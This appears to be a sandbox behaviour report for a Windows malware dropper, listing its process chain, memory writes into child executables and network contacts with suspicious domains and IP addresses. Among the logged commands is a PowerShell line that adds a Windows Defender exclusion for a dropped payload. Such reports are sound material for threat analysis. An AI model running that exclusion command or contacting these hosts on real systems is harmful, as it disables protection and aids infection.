Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4056 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4056 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4056 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe
PID 1712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe
PID 1712 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe
PID 1608 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1608 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1812 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe
PID 1812 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe
PID 2676 wrote to memory of 4676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 2676 wrote to memory of 4676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 2676 wrote to memory of 4676 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 4584 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe
PID 4584 wrote to memory of 5072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe
PID 4224 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe
PID 4224 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe
PID 4224 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe
PID 3564 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe
PID 3564 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe
PID 3064 wrote to memory of 552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe
PID 3064 wrote to memory of 552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe
PID 2044 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe
PID 2044 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe
PID 2044 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe
PID 5072 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 5072 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 5072 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 3640 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe
PID 3640 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe
PID 3640 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe
PID 3708 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe
PID 3708 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe
PID 3708 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe
PID 4676 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe
PID 4676 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1608 -ip 1608

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 496

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1416 -ip 1416

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562933 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 356

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS5CA2.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5a6746f8,0x7ffc5a674708,0x7ffc5a674718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1448,12408496898725353159,6626814908488685272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3520 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 239.2.123.176.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
N/A 127.0.0.1:63294 tcp
N/A 127.0.0.1:63296 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
